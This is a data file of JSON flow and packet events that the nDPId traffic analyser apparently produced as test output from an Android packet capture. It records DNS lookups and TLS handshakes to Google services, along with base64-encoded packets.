00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869361,"flow_last_seen":1582454869361,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454869361,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1582454869363,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1582454869363,"pkt":"TGr2n\/YnxiwDYGpkCABFAABORPIAAEARsEvAqAIBwKgCEAA1mGAAOr6H6DGBgAABAAEAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="}
00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":166,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869361,"flow_last_seen":1582454869363,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454869363,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869517,"flow_last_seen":1582454869517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454869517,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1582454869517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869517,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8ooxAAEAGf8\/AqAIQrNmozsTQAbv86pehAAAAAKAC\/\/+fWQAAAgQFtAQCCAr\/\/zUtAAAAAAEDAwg="}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1582454869556,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869556,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA80VwAAHUGW\/+s2ajOwKgCEAG7xNCPRbjJ\/OqXoqAS6yAGLQAAAgQFZAQCCApmsf+J\/\/81LQEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1582454869557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454869557,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0oo1AAEAGf9bAqAIQrNmozsTQAbv86peij0W4yoAQAVceWQAAAQEICv\/\/NUhmsf+J"}
00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454869517,"flow_last_seen":1582454869614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1582454869614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869626,"flow_last_seen":1582454869626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454869626,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1582454869626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869626,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8g2ZAAEAG9TXAqAIQ2O8meMFmFGxVMrY\/AAAAAKAC\/\/9vQQAAAgQFtAQCCAr\/\/zVZAAAAAAEDAwg="}
00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":174,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":176,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":423,"midstream":0,"thread_ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","server_names":"*.google-analytics.com,*.fps.goog,app-measurement.com,fps.goog,google-analytics.com,googleoptimize.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googleoptimize.com,www.googletagmanager.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google-analytics.com","alpn":"http\/1.1","fingerprint":"B0:D9:D3:57:C2:34:87:2C:FB:F5:E6:BD:7F:9F:54:65:08:61:AF:01"}}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1582454870649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454870649,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8g2dAAEAG9TTAqAIQ2O8meMFmFGxVMrY\/AAAAAKAC\/\/9uQgAAAgQFtAQCCAr\/\/zZYAAAAAAEDAwg="}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869517,"flow_last_seen":1582454869517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454869517,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1582454869517,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869517,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8ooxAAEAGf8\/AqAIQrNmozsTQAbv86pehAAAAAKAC\/\/+fWQAAAgQFtAQCCAr\/\/zUtAAAAAAEDAwg="}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1582454869556,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869556,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA80VwAAHUGW\/+s2ajOwKgCEAG7xNCPRbjJ\/OqXoqAS6yAGLQAAAgQFZAQCCApmsf+J\/\/81LQEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1582454869557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454869557,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0oo1AAEAGf9bAqAIQrNmozsTQAbv86peij0W4yoAQAVceWQAAAQEICv\/\/NUhmsf+J"}
00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454869517,"flow_last_seen":1582454869614,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1582454869614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869626,"flow_last_seen":1582454869626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454869626,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1582454869626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869626,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8g2ZAAEAG9TXAqAIQ2O8meMFmFGxVMrY\/AAAAAKAC\/\/9vQQAAAgQFtAQCCAr\/\/zVZAAAAAAEDAwg="}
00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":174,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":176,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":423,"midstream":0,"thread_ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","server_names":"*.google-analytics.com,*.fps.goog,app-measurement.com,fps.goog,google-analytics.com,googleoptimize.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googleoptimize.com,www.googletagmanager.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google-analytics.com","alpn":"http\/1.1","fingerprint":"B0:D9:D3:57:C2:34:87:2C:FB:F5:E6:BD:7F:9F:54:65:08:61:AF:01"}}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1582454870649,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454870649,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8g2dAAEAG9TTAqAIQ2O8meMFmFGxVMrY\/AAAAAKAC\/\/9uQgAAAgQFtAQCCAr\/\/zZYAAAAAAEDAwg="}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454870996,"flow_last_seen":1582454870996,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454870996,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1582454870996,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1582454870996,"pkt":"xiwDYGpkTGr2n\/YnCABFAABIq6dAAEARCZzAqAIQwKgCAY8FADUANFCq5z4BAAABAAAAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAE="}
00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454870996,"flow_last_seen":1582454870996,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454870996,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1582454870998,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1582454870998,"pkt":"TGr2n\/YnxiwDYGpkCABFAABYgb0AAEARc3bAqAIBwKgCEAA1jwUARA+05z6BgAABAAEAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAHADAABAAEAAADaAATY7yZ4"}
00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":201,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454870996,"flow_last_seen":1582454870998,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454870998,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871042,"flow_last_seen":1582454871042,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871042,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1582454871042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871042,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA83wxAAEAGmY\/AqAIQ2O8meIDaAbu5DOmwAAAAAKAC\/\/8p0AAAAgQFtAQCCAr\/\/za8AAAAAAEDAwg="}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871042,"flow_last_seen":1582454871042,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871042,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1582454871042,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871042,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA83wxAAEAGmY\/AqAIQ2O8meIDaAbu5DOmwAAAAAKAC\/\/8p0AAAAgQFtAQCCAr\/\/za8AAAAAAEDAwg="}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871051,"flow_last_seen":1582454871051,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871051,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1582454871051,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871051,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBq69AAEARCZvAqAIQwKgCAX6cADUALTLn3DQBAAABAAAAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAQ=="}
00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871051,"flow_last_seen":1582454871051,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871051,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1582454871056,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871056,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA84WAAAHcGoDvY7yZ4wKgCEAG7gNr8u4aauQzpsaAS6yCywwAAAgQFZAQCCAqJFH+\/\/\/82vAEDAwg="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1582454871057,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871057,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA03w1AAEAGmZbAqAIQ2O8meIDaAbu5DOmx\/LuGm4AQAVfLBwAAAQEICv\/\/Nr+JFH+\/"}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1582454871056,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871056,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA84WAAAHcGoDvY7yZ4wKgCEAG7gNr8u4aauQzpsaAS6yCywwAAAgQFZAQCCAqJFH+\/\/\/82vAEDAwg="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1582454871057,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871057,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA03w1AAEAGmZbAqAIQ2O8meIDaAbu5DOmx\/LuGm4AQAVfLBwAAAQEICv\/\/Nr+JFH+\/"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1582454871058,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1582454871058,"pkt":"MzMAAAACTGr2n\/Ynht1gAAAAABA6\/\/6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAAAChQAIygAAAAABAUxq9p\/2Jw=="}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871061,"flow_last_seen":1582454871061,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871061,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
